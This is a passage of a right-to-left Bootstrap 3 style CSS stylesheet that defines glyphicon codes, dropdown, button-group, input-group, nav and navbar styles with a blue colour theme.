.glyphicon-log-out:before {
  content: "\e163";
}
.glyphicon-new-window:before {
  content: "\e164";
}
.glyphicon-record:before {
  content: "\e165";
}
.glyphicon-save:before {
  content: "\e166";
}
.glyphicon-open:before {
  content: "\e167";
}
.glyphicon-saved:before {
  content: "\e168";
}
.glyphicon-import:before {
  content: "\e169";
}
.glyphicon-export:before {
  content: "\e170";
}
.glyphicon-send:before {
  content: "\e171";
}
.glyphicon-floppy-disk:before {
  content: "\e172";
}
.glyphicon-floppy-saved:before {
  content: "\e173";
}
.glyphicon-floppy-remove:before {
  content: "\e174";
}
.glyphicon-floppy-save:before {
  content: "\e175";
}
.glyphicon-floppy-open:before {
  content: "\e176";
}
.glyphicon-credit-card:before {
  content: "\e177";
}
.glyphicon-transfer:before {
  content: "\e178";
}
.glyphicon-cutlery:before {
  content: "\e179";
}
.glyphicon-header:before {
  content: "\e180";
}
.glyphicon-compressed:before {
  content: "\e181";
}
.glyphicon-earphone:before {
  content: "\e182";
}
.glyphicon-phone-alt:before {
  content: "\e183";
}
.glyphicon-tower:before {
  content: "\e184";
}
.glyphicon-stats:before {
  content: "\e185";
}
.glyphicon-sd-video:before {
  content: "\e186";
}
.glyphicon-hd-video:before {
  content: "\e187";
}
.glyphicon-subtitles:before {
  content: "\e188";
}
.glyphicon-sound-stereo:before {
  content: "\e189";
}
.glyphicon-sound-dolby:before {
  content: "\e190";
}
.glyphicon-sound-5-1:before {
  content: "\e191";
}
.glyphicon-sound-6-1:before {
  content: "\e192";
}
.glyphicon-sound-7-1:before {
  content: "\e193";
}
.glyphicon-copyright-mark:before {
  content: "\e194";
}
.glyphicon-registration-mark:before {
  content: "\e195";
}
.glyphicon-cloud-download:before {
  content: "\e197";
}
.glyphicon-cloud-upload:before {
  content: "\e198";
}
.glyphicon-tree-conifer:before {
  content: "\e199";
}
.glyphicon-tree-deciduous:before {
  content: "\e200";
}
.glyphicon-cd:before {
  content: "\e201";
}
.glyphicon-save-file:before {
  content: "\e202";
}
.glyphicon-open-file:before {
  content: "\e203";
}
.glyphicon-level-up:before {
  content: "\e204";
}
.glyphicon-copy:before {
  content: "\e205";
}
.glyphicon-paste:before {
  content: "\e206";
}
.glyphicon-alert:before {
  content: "\e209";
}
.glyphicon-equalizer:before {
  content: "\e210";
}
.glyphicon-king:before {
  content: "\e211";
}
.glyphicon-queen:before {
  content: "\e212";
}
.glyphicon-pawn:before {
  content: "\e213";
}
.glyphicon-bishop:before {
  content: "\e214";
}
.glyphicon-knight:before {
  content: "\e215";
}
.glyphicon-baby-formula:before {
  content: "\e216";
}
.glyphicon-tent:before {
  content: "\26fa";
}
.glyphicon-blackboard:before {
  content: "\e218";
}
.glyphicon-bed:before {
  content: "\e219";
}
.glyphicon-apple:before {
  content: "\f8ff";
}
.glyphicon-erase:before {
  content: "\e221";
}
.glyphicon-hourglass:before {
  content: "\231b";
}
.glyphicon-lamp:before {
  content: "\e223";
}
.glyphicon-duplicate:before {
  content: "\e224";
}
.glyphicon-piggy-bank:before {
  content: "\e225";
}
.glyphicon-scissors:before {
  content: "\e226";
}
.glyphicon-bitcoin:before {
  content: "\e227";
}
.glyphicon-btc:before {
  content: "\e227";
}
.glyphicon-xbt:before {
  content: "\e227";
}
.glyphicon-yen:before {
  content: "\00a5";
}
.glyphicon-jpy:before {
  content: "\00a5";
}
.glyphicon-ruble:before {
  content: "\20bd";
}
.glyphicon-rub:before {
  content: "\20bd";
}
.glyphicon-scale:before {
  content: "\e230";
}
.glyphicon-ice-lolly:before {
  content: "\e231";
}
.glyphicon-ice-lolly-tasted:before {
  content: "\e232";
}
.glyphicon-education:before {
  content: "\e233";
}
.glyphicon-option-horizontal:before {
  content: "\e234";
}
.glyphicon-option-vertical:before {
  content: "\e235";
}
.glyphicon-menu-hamburger:before {
  content: "\e236";
}
.glyphicon-modal-window:before {
  content: "\e237";
}
.glyphicon-oil:before {
  content: "\e238";
}
.glyphicon-grain:before {
  content: "\e239";
}
.glyphicon-sunglasses:before {
  content: "\e240";
}
.glyphicon-text-size:before {
  content: "\e241";
}
.glyphicon-text-color:before {
  content: "\e242";
}
.glyphicon-text-background:before {
  content: "\e243";
}
.glyphicon-object-align-top:before {
  content: "\e244";
}
.glyphicon-object-align-bottom:before {
  content: "\e245";
}
.glyphicon-object-align-horizontal:before {
  content: "\e246";
}
.glyphicon-object-align-left:before {
  content: "\e247";
}
.glyphicon-object-align-vertical:before {
  content: "\e248";
}
.glyphicon-object-align-right:before {
  content: "\e249";
}
.glyphicon-triangle-right:before {
  content: "\e250";
}
.glyphicon-triangle-left:before {
  content: "\e251";
}
.glyphicon-triangle-bottom:before {
  content: "\e252";
}
.glyphicon-triangle-top:before {
  content: "\e253";
}
.glyphicon-console:before {
  content: "\e254";
}
.glyphicon-superscript:before {
  content: "\e255";
}
.glyphicon-subscript:before {
  content: "\e256";
}
.glyphicon-menu-left:before {
  content: "\e257";
}
.glyphicon-menu-right:before {
  content: "\e258";
}
.glyphicon-menu-down:before {
  content: "\e259";
}
.glyphicon-menu-up:before {
  content: "\e260";
}
.caret {
  display: inline-block;
  width: 0;
  height: 0;
  margin-right: 2px;
  vertical-align: middle;
  border-top: 4px dashed;
  border-top: 4px solid \9;
  border-left: 4px solid transparent;
  border-right: 4px solid transparent;
}
.dropup,
.dropdown {
  position: relative;
}
.dropdown-toggle:focus {
  outline: 0;
}
.dropdown-menu {
  position: absolute;
  top: 100%;
  right: 0;
  z-index: 1000;
  display: none;
  float: right;
  min-width: 160px;
  padding: 5px 0;
  margin: 2px 0 0;
  font-size: 14px;
  text-align: right;
  list-style: none;
  background-color: #444444;
  background-clip: padding-box;
  border: 1px solid #444444;
  border-radius: 0;
  -webkit-box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
  box-shadow: 0 6px 12px rgba(0, 0, 0, 0.175);
}
.dropdown-menu.pull-right {
  left: 0;
  right: auto;
}
.dropdown-menu .divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #515151;
}
.dropdown-menu > li > a {
  display: block;
  padding: 3px 20px;
  clear: both;
  font-weight: 400;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-menu > li > a:hover,
.dropdown-menu > li > a:focus {
  color: #ffffff;
  text-decoration: none;
  background-color: #515151;
}
.dropdown-menu > .active > a,
.dropdown-menu > .active > a:hover,
.dropdown-menu > .active > a:focus {
  color: #ffffff;
  text-decoration: none;
  background-color: #373737;
  outline: 0;
}
.dropdown-menu > .disabled > a,
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  color: #999999;
}
.dropdown-menu > .disabled > a:hover,
.dropdown-menu > .disabled > a:focus {
  text-decoration: none;
  cursor: not-allowed;
  background-color: transparent;
  background-image: none;
  filter: progid:DXImageTransform.Microsoft.gradient(enabled = false);
}
.open > .dropdown-menu {
  display: block;
}
.open > a {
  outline: 0;
}
.dropdown-menu-right {
  left: 0;
  right: auto;
}
.dropdown-menu-left {
  left: auto;
  right: 0;
}
.dropdown-header {
  display: block;
  padding: 3px 20px;
  font-size: 12px;
  line-height: 1.42857143;
  color: #999999;
  white-space: nowrap;
}
.dropdown-backdrop {
  position: fixed;
  top: 0;
  left: 0;
  bottom: 0;
  right: 0;
  z-index: 990;
}
.pull-right > .dropdown-menu {
  left: 0;
  right: auto;
}
.dropup .caret,
.navbar-fixed-bottom .dropdown .caret {
  content: "";
  border-top: 0;
  border-bottom: 4px dashed;
  border-bottom: 4px solid \9;
}
.dropup .dropdown-menu,
.navbar-fixed-bottom .dropdown .dropdown-menu {
  top: auto;
  bottom: 100%;
  margin-bottom: 2px;
}
@media (min-width: 991px) {
  .navbar-right .dropdown-menu {
    left: 0;
    right: auto;
  }
  .navbar-right .dropdown-menu-left {
    left: auto;
    right: 0;
  }
}
.btn-group,
.btn-group-vertical {
  position: relative;
  display: inline-block;
  vertical-align: middle;
}
.btn-group > .btn,
.btn-group-vertical > .btn {
  position: relative;
  float: right;
}
.btn-group > .btn:hover,
.btn-group-vertical > .btn:hover,
.btn-group > .btn:focus,
.btn-group-vertical > .btn:focus,
.btn-group > .btn:active,
.btn-group-vertical > .btn:active,
.btn-group > .btn.active,
.btn-group-vertical > .btn.active {
  z-index: 2;
}
.btn-group .btn + .btn,
.btn-group .btn + .btn-group,
.btn-group .btn-group + .btn,
.btn-group .btn-group + .btn-group {
  margin-right: -1px;
}
.btn-toolbar {
  margin-right: -5px;
}
.btn-toolbar .btn,
.btn-toolbar .btn-group,
.btn-toolbar .input-group {
  float: right;
}
.btn-toolbar > .btn,
.btn-toolbar > .btn-group,
.btn-toolbar > .input-group {
  margin-right: 5px;
}
.btn-group > .btn:not(:first-child):not(:last-child):not(.dropdown-toggle) {
  border-radius: 0;
}
.btn-group > .btn:first-child {
  margin-right: 0;
}
.btn-group > .btn:first-child:not(:last-child):not(.dropdown-toggle) {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group > .btn:last-child:not(:first-child),
.btn-group > .dropdown-toggle:not(:first-child) {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group > .btn-group {
  float: right;
}
.btn-group > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group .dropdown-toggle:active,
.btn-group.open .dropdown-toggle {
  outline: 0;
}
.btn-group > .btn + .dropdown-toggle {
  padding-left: 8px;
  padding-right: 8px;
}
.btn-group > .btn-lg + .dropdown-toggle {
  padding-left: 12px;
  padding-right: 12px;
}
.btn-group.open .dropdown-toggle {
  -webkit-box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
  box-shadow: inset 0 3px 5px rgba(0, 0, 0, 0.125);
}
.btn-group.open .dropdown-toggle.btn-link {
  -webkit-box-shadow: none;
  box-shadow: none;
}
.btn .caret {
  margin-right: 0;
}
.btn-lg .caret {
  border-width: 5px 5px 0;
  border-bottom-width: 0;
}
.dropup .btn-lg .caret {
  border-width: 0 5px 5px;
}
.btn-group-vertical > .btn,
.btn-group-vertical > .btn-group,
.btn-group-vertical > .btn-group > .btn {
  display: block;
  float: none;
  width: 100%;
  max-width: 100%;
}
.btn-group-vertical > .btn-group > .btn {
  float: none;
}
.btn-group-vertical > .btn + .btn,
.btn-group-vertical > .btn + .btn-group,
.btn-group-vertical > .btn-group + .btn,
.btn-group-vertical > .btn-group + .btn-group {
  margin-top: -1px;
  margin-right: 0;
}
.btn-group-vertical > .btn:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.btn-group-vertical > .btn:first-child:not(:last-child) {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group-vertical > .btn:last-child:not(:first-child) {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group-vertical > .btn-group:not(:first-child):not(:last-child) > .btn {
  border-radius: 0;
}
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .btn:last-child,
.btn-group-vertical > .btn-group:first-child:not(:last-child) > .dropdown-toggle {
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group-vertical > .btn-group:last-child:not(:first-child) > .btn:first-child {
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.btn-group-justified {
  display: table;
  width: 100%;
  table-layout: fixed;
  border-collapse: separate;
}
.btn-group-justified > .btn,
.btn-group-justified > .btn-group {
  display: table-cell;
  float: none;
  width: 1%;
}
.btn-group-justified > .btn-group .btn {
  width: 100%;
}
.btn-group-justified > .btn-group .dropdown-menu {
  right: auto;
}
[data-toggle="buttons"] > .btn input[type="radio"],
[data-toggle="buttons"] > .btn-group > .btn input[type="radio"],
[data-toggle="buttons"] > .btn input[type="checkbox"],
[data-toggle="buttons"] > .btn-group > .btn input[type="checkbox"] {
  position: absolute;
  clip: rect(0, 0, 0, 0);
  pointer-events: none;
}
.input-group {
  position: relative;
  display: table;
  border-collapse: separate;
}
.input-group[class*="col-"] {
  float: none;
  padding-left: 0;
  padding-right: 0;
}
.input-group .form-control {
  position: relative;
  z-index: 2;
  float: right;
  width: 100%;
  margin-bottom: 0;
}
.input-group .form-control:focus {
  z-index: 3;
}
.input-group-lg > .form-control,
.input-group-lg > .input-group-addon,
.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  padding: 10px 16px;
  font-size: 18px;
  line-height: 1.33;
  border-radius: 0;
}
select.input-group-lg > .form-control,
select.input-group-lg > .input-group-addon,
select.input-group-lg > .input-group-btn > .btn {
  height: 45px;
  line-height: 45px;
}
textarea.input-group-lg > .form-control,
textarea.input-group-lg > .input-group-addon,
textarea.input-group-lg > .input-group-btn > .btn,
select[multiple].input-group-lg > .form-control,
select[multiple].input-group-lg > .input-group-addon,
select[multiple].input-group-lg > .input-group-btn > .btn {
  height: auto;
}
.input-group-sm > .form-control,
.input-group-sm > .input-group-addon,
.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  padding: 5px 10px;
  font-size: 12px;
  line-height: 1.5;
  border-radius: 0;
}
select.input-group-sm > .form-control,
select.input-group-sm > .input-group-addon,
select.input-group-sm > .input-group-btn > .btn {
  height: 30px;
  line-height: 30px;
}
textarea.input-group-sm > .form-control,
textarea.input-group-sm > .input-group-addon,
textarea.input-group-sm > .input-group-btn > .btn,
select[multiple].input-group-sm > .form-control,
select[multiple].input-group-sm > .input-group-addon,
select[multiple].input-group-sm > .input-group-btn > .btn {
  height: auto;
}
.input-group-addon,
.input-group-btn,
.input-group .form-control {
  display: table-cell;
}
.input-group-addon:not(:first-child):not(:last-child),
.input-group-btn:not(:first-child):not(:last-child),
.input-group .form-control:not(:first-child):not(:last-child) {
  border-radius: 0;
}
.input-group-addon,
.input-group-btn {
  width: 1%;
  white-space: nowrap;
  vertical-align: middle;
}
.input-group-addon {
  padding: 6px 12px;
  font-size: 14px;
  font-weight: 400;
  line-height: 1;
  color: #666666;
  text-align: center;
  background-color: #eeeeee;
  border: 1px solid #cccccc;
  border-radius: 0;
}
.input-group-addon.input-sm {
  padding: 5px 10px;
  font-size: 12px;
  border-radius: 0;
}
.input-group-addon.input-lg {
  padding: 10px 16px;
  font-size: 18px;
  border-radius: 0;
}
.input-group-addon input[type="radio"],
.input-group-addon input[type="checkbox"] {
  margin-top: 0;
}
.input-group .form-control:first-child,
.input-group-addon:first-child,
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group > .btn,
.input-group-btn:first-child > .dropdown-toggle,
.input-group-btn:last-child > .btn:not(:last-child):not(.dropdown-toggle),
.input-group-btn:last-child > .btn-group:not(:last-child) > .btn {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}
.input-group-addon:first-child {
  border-left: 0;
}
.input-group .form-control:last-child,
.input-group-addon:last-child,
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group > .btn,
.input-group-btn:last-child > .dropdown-toggle,
.input-group-btn:first-child > .btn:not(:first-child),
.input-group-btn:first-child > .btn-group:not(:first-child) > .btn {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.input-group-addon:last-child {
  border-right: 0;
}
.input-group-btn {
  position: relative;
  font-size: 0;
  white-space: nowrap;
}
.input-group-btn > .btn {
  position: relative;
}
.input-group-btn > .btn + .btn {
  margin-right: -1px;
}
.input-group-btn > .btn:hover,
.input-group-btn > .btn:focus,
.input-group-btn > .btn:active {
  z-index: 2;
}
.input-group-btn:first-child > .btn,
.input-group-btn:first-child > .btn-group {
  margin-left: -1px;
}
.input-group-btn:last-child > .btn,
.input-group-btn:last-child > .btn-group {
  z-index: 2;
  margin-right: -1px;
}
.nav {
  padding-right: 0;
  margin-bottom: 0;
  list-style: none;
}
.nav > li {
  position: relative;
  display: block;
}
.nav > li > a {
  position: relative;
  display: block;
  padding: 10px 15px;
}
.nav > li > a:hover,
.nav > li > a:focus {
  text-decoration: none;
  background-color: #eeeeee;
}
.nav > li.disabled > a {
  color: #999999;
}
.nav > li.disabled > a:hover,
.nav > li.disabled > a:focus {
  color: #999999;
  text-decoration: none;
  cursor: not-allowed;
  background-color: transparent;
}
.nav .open > a,
.nav .open > a:hover,
.nav .open > a:focus {
  background-color: #eeeeee;
  border-color: #0077bb;
}
.nav .nav-divider {
  height: 1px;
  margin: 9px 0;
  overflow: hidden;
  background-color: #e5e5e5;
}
.nav > li > a > img {
  max-width: none;
}
.nav-tabs {
  border-bottom: 1px solid #dddddd;
}
.nav-tabs > li {
  float: right;
  margin-bottom: -1px;
}
.nav-tabs > li > a {
  margin-left: 2px;
  line-height: 1.42857143;
  border: 1px solid transparent;
  border-radius: 0 0 0 0;
}
.nav-tabs > li > a:hover {
  border-color: #eeeeee #eeeeee #dddddd;
}
.nav-tabs > li.active > a,
.nav-tabs > li.active > a:hover,
.nav-tabs > li.active > a:focus {
  color: #666666;
  cursor: default;
  background-color: #ffffff;
  border: 1px solid #dddddd;
  border-bottom-color: transparent;
}
.nav-tabs.nav-justified {
  width: 100%;
  border-bottom: 0;
}
.nav-tabs.nav-justified > li {
  float: none;
}
.nav-tabs.nav-justified > li > a {
  margin-bottom: 5px;
  text-align: center;
}
.nav-tabs.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  right: auto;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-tabs.nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs.nav-justified > li > a {
  margin-left: 0;
  border-radius: 0;
}
.nav-tabs.nav-justified > .active > a,
.nav-tabs.nav-justified > .active > a:hover,
.nav-tabs.nav-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs.nav-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0 0 0 0;
  }
  .nav-tabs.nav-justified > .active > a,
  .nav-tabs.nav-justified > .active > a:hover,
  .nav-tabs.nav-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.nav-pills > li {
  float: right;
}
.nav-pills > li > a {
  border-radius: 0;
}
.nav-pills > li + li {
  margin-right: 2px;
}
.nav-pills > li.active > a,
.nav-pills > li.active > a:hover,
.nav-pills > li.active > a:focus {
  color: #ffffff;
  background-color: #0077bb;
}
.nav-stacked > li {
  float: none;
}
.nav-stacked > li + li {
  margin-top: 2px;
  margin-right: 0;
}
.nav-justified {
  width: 100%;
}
.nav-justified > li {
  float: none;
}
.nav-justified > li > a {
  margin-bottom: 5px;
  text-align: center;
}
.nav-justified > .dropdown .dropdown-menu {
  top: auto;
  right: auto;
}
@media (min-width: 768px) {
  .nav-justified > li {
    display: table-cell;
    width: 1%;
  }
  .nav-justified > li > a {
    margin-bottom: 0;
  }
}
.nav-tabs-justified {
  border-bottom: 0;
}
.nav-tabs-justified > li > a {
  margin-left: 0;
  border-radius: 0;
}
.nav-tabs-justified > .active > a,
.nav-tabs-justified > .active > a:hover,
.nav-tabs-justified > .active > a:focus {
  border: 1px solid #dddddd;
}
@media (min-width: 768px) {
  .nav-tabs-justified > li > a {
    border-bottom: 1px solid #dddddd;
    border-radius: 0 0 0 0;
  }
  .nav-tabs-justified > .active > a,
  .nav-tabs-justified > .active > a:hover,
  .nav-tabs-justified > .active > a:focus {
    border-bottom-color: #ffffff;
  }
}
.tab-content > .tab-pane {
  display: none;
}
.tab-content > .active {
  display: block;
}
.nav-tabs .dropdown-menu {
  margin-top: -1px;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.navbar {
  position: relative;
  min-height: 55px;
  margin-bottom: 20px;
  border: 1px solid transparent;
}
@media (min-width: 991px) {
  .navbar {
    border-radius: 0;
  }
}
@media (min-width: 991px) {
  .navbar-header {
    float: right;
  }
}
.navbar-collapse {
  padding-left: 20px;
  padding-right: 20px;
  overflow-x: visible;
  border-top: 1px solid transparent;
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1);
  -webkit-overflow-scrolling: touch;
}
.navbar-collapse.in {
  overflow-y: auto;
}
@media (min-width: 991px) {
  .navbar-collapse {
    width: auto;
    border-top: 0;
    box-shadow: none;
  }
  .navbar-collapse.collapse {
    display: block !important;
    height: auto !important;
    padding-bottom: 0;
    overflow: visible !important;
  }
  .navbar-collapse.in {
    overflow-y: visible;
  }
  .navbar-fixed-top .navbar-collapse,
  .navbar-static-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    padding-left: 0;
    padding-right: 0;
  }
}
.navbar-fixed-top,
.navbar-fixed-bottom {
  position: fixed;
  left: 0;
  right: 0;
  z-index: 1030;
}
.navbar-fixed-top .navbar-collapse,
.navbar-fixed-bottom .navbar-collapse {
  max-height: 340px;
}
@media (max-device-width: 480px) and (orientation: landscape) {
  .navbar-fixed-top .navbar-collapse,
  .navbar-fixed-bottom .navbar-collapse {
    max-height: 200px;
  }
}
@media (min-width: 991px) {
  .navbar-fixed-top,
  .navbar-fixed-bottom {
    border-radius: 0;
  }
}
.navbar-fixed-top {
  top: 0;
  border-width: 0 0 1px;
}
.navbar-fixed-bottom {
  bottom: 0;
  margin-bottom: 0;
  border-width: 1px 0 0;
}
.container > .navbar-header,
.container-fluid > .navbar-header,
.container > .navbar-collapse,
.container-fluid > .navbar-collapse {
  margin-left: -20px;
  margin-right: -20px;
}
@media (min-width: 991px) {
  .container > .navbar-header,
  .container-fluid > .navbar-header,
  .container > .navbar-collapse,
  .container-fluid > .navbar-collapse {
    margin-left: 0;
    margin-right: 0;
  }
}
.navbar-static-top {
  z-index: 1000;
  border-width: 0 0 1px;
}
@media (min-width: 991px) {
  .navbar-static-top {
    border-radius: 0;
  }
}
.navbar-brand {
  float: right;
  height: 55px;
  padding: 17.5px 20px;
  font-size: 18px;
  line-height: 20px;
}
.navbar-brand:hover,
.navbar-brand:focus {
  text-decoration: none;
}
.navbar-brand > img {
  display: block;
}
@media (min-width: 991px) {
  .navbar > .container .navbar-brand,
  .navbar > .container-fluid .navbar-brand {
    margin-right: -20px;
  }
}
.navbar-toggle {
  position: relative;
  float: left;
  padding: 9px 10px;
  margin-left: 20px;
  margin-top: 10.5px;
  margin-bottom: 10.5px;
  background-color: transparent;
  background-image: none;
  border: 1px solid transparent;
  border-radius: 0;
}
.navbar-toggle:focus {
  outline: 0;
}
.navbar-toggle .icon-bar {
  display: block;
  width: 22px;
  height: 2px;
  border-radius: 1px;
}
.navbar-toggle .icon-bar + .icon-bar {
  margin-top: 4px;
}
@media (min-width: 991px) {
  .navbar-toggle {
    display: none;
  }
}
.navbar-nav {
  margin: 8.75px -20px;
}
.navbar-nav > li > a {
  padding-top: 10px;
  padding-bottom: 10px;
  line-height: 20px;
}
@media (max-width: 990px) {
  .navbar-nav .open .dropdown-menu {
    position: static;
    float: none;
    width: auto;
    margin-top: 0;
    background-color: transparent;
    border: 0;
    box-shadow: none;
  }
  .navbar-nav .open .dropdown-menu > li > a,
  .navbar-nav .open .dropdown-menu .dropdown-header {
    padding: 5px 25px 5px 15px;
  }
  .navbar-nav .open .dropdown-menu > li > a {
    line-height: 20px;
  }
  .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-nav .open .dropdown-menu > li > a:focus {
    background-image: none;
  }
}
@media (min-width: 991px) {
  .navbar-nav {
    float: right;
    margin: 0;
  }
  .navbar-nav > li {
    float: right;
  }
  .navbar-nav > li > a {
    padding-top: 17.5px;
    padding-bottom: 17.5px;
  }
}
.navbar-form {
  padding: 10px 20px;
  margin-left: -20px;
  margin-right: -20px;
  border-top: 1px solid transparent;
  border-bottom: 1px solid transparent;
  -webkit-box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  box-shadow: inset 0 1px 0 rgba(255, 255, 255, 0.1), 0 1px 0 rgba(255, 255, 255, 0.1);
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
@media (min-width: 768px) {
  .navbar-form .inputbox,
  .navbar-form select,
  .navbar-form textarea,
  .navbar-form input {
    display: inline-block;
  }
}
@media (min-width: 768px) {
  .navbar-form .form-group {
    display: inline-block;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .form-control {
    display: inline-block;
    width: auto;
    vertical-align: middle;
  }
  .navbar-form .form-control-static {
    display: inline-block;
  }
  .navbar-form .input-group {
    display: inline-table;
    vertical-align: middle;
  }
  .navbar-form .input-group .input-group-addon,
  .navbar-form .input-group .input-group-btn,
  .navbar-form .input-group .form-control {
    width: auto;
  }
  .navbar-form .input-group > .form-control {
    width: 100%;
  }
  .navbar-form .control-label {
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio,
  .navbar-form .checkbox {
    display: inline-block;
    margin-top: 0;
    margin-bottom: 0;
    vertical-align: middle;
  }
  .navbar-form .radio label,
  .navbar-form .checkbox label {
    padding-right: 0;
  }
  .navbar-form .radio input[type="radio"],
  .navbar-form .checkbox input[type="checkbox"] {
    position: relative;
    margin-right: 0;
  }
  .navbar-form .has-feedback .form-control-feedback {
    top: 0;
  }
}
@media (max-width: 990px) {
  .navbar-form .form-group {
    margin-bottom: 5px;
  }
  .navbar-form .form-group:last-child {
    margin-bottom: 0;
  }
}
@media (min-width: 991px) {
  .navbar-form {
    width: auto;
    padding-top: 0;
    padding-bottom: 0;
    margin-left: 0;
    margin-right: 0;
    border: 0;
    -webkit-box-shadow: none;
    box-shadow: none;
  }
}
.navbar-nav > li > .dropdown-menu {
  margin-top: 0;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
}
.navbar-fixed-bottom .navbar-nav > li > .dropdown-menu {
  margin-bottom: 0;
  border-top-right-radius: 0;
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
  border-bottom-right-radius: 0;
}
.navbar-btn {
  margin-top: 10.5px;
  margin-bottom: 10.5px;
}
.navbar-btn.btn-sm {
  margin-top: 12.5px;
  margin-bottom: 12.5px;
}
.navbar-btn.btn-xs {
  margin-top: 16.5px;
  margin-bottom: 16.5px;
}
.navbar-text {
  margin-top: 17.5px;
  margin-bottom: 17.5px;
}
@media (min-width: 991px) {
  .navbar-text {
    float: right;
    margin-left: 20px;
    margin-right: 20px;
  }
}
@media (min-width: 991px) {
  .navbar-left {
    float: right !important;
  }
  .navbar-right {
    float: left !important;
    margin-left: -20px;
  }
  .navbar-left ~ .navbar-right {
    margin-left: 0;
  }
}
.navbar-default {
  background-color: #0077bb;
  border-color: #0067a2;
}
.navbar-default .navbar-brand {
  color: #bbe6ff;
}
.navbar-default .navbar-brand:hover,
.navbar-default .navbar-brand:focus {
  color: #88d4ff;
  background-color: transparent;
}
.navbar-default .navbar-text {
  color: #bbe6ff;
}
.navbar-default .navbar-nav > li > a {
  color: #bbe6ff;
}
.navbar-default .navbar-nav > li > a:hover,
.navbar-default .navbar-nav > li > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .active > a,
.navbar-default .navbar-nav > .active > a:hover,
.navbar-default .navbar-nav > .active > a:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-default .navbar-nav > .disabled > a,
.navbar-default .navbar-nav > .disabled > a:hover,
.navbar-default .navbar-nav > .disabled > a:focus {
  color: #cccccc;
  background-color: transparent;
}
.navbar-default .navbar-nav > .open > a,
.navbar-default .navbar-nav > .open > a:hover,
.navbar-default .navbar-nav > .open > a:focus {
  color: #ffffff;
  background-color: transparent;
}
@media (max-width: 990px) {
  .navbar-default .navbar-nav .open .dropdown-menu > li > a {
    color: #bbe6ff;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > li > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .active > a:focus {
    color: #ffffff;
    background-color: transparent;
  }
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:hover,
  .navbar-default .navbar-nav .open .dropdown-menu > .disabled > a:focus {
    color: #cccccc;
    background-color: transparent;
  }
}
.navbar-default .navbar-toggle {
  border-color: #0077bb;
}
.navbar-default .navbar-toggle:hover,
.navbar-default .navbar-toggle:focus {
  background-color: #0077bb;
}
.navbar-default .navbar-toggle .icon-bar {
  background-color: #ffffff;
}
.navbar-default .navbar-collapse,
.navbar-default .navbar-form {
  border-color: #0067a2;
}
.navbar-default .navbar-link {
  color: #bbe6ff;
}
.navbar-default .navbar-link:hover {
  color: #ffffff;
}
.navbar-default .btn-link {
  color: #bbe6ff;
}
.navbar-default .btn-link:hover,
.navbar-default .btn-link:focus {
  color: #ffffff;
}
.navbar-default .btn-link[disabled]:hover,
fieldset[disabled] .navbar-default .btn-link:hover,
.navbar-default .btn-link[disabled]:focus,
fieldset[disabled] .navbar-default .btn-link:focus {
  color: #cccccc;
}
.navbar-inverse {
  background-color: #222222;
  border-color: #080808;
}
.navbar-inverse .navbar-brand {
  color: #999999;
}
.navbar-inverse .navbar-brand:hover,
.navbar-inverse .navbar-brand:focus {
  color: #ffffff;
  background-color: transparent;
}
.navbar-inverse .navbar-text {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a {
  color: #999999;
}
.navbar-inverse .navbar-nav > li > a:hover,
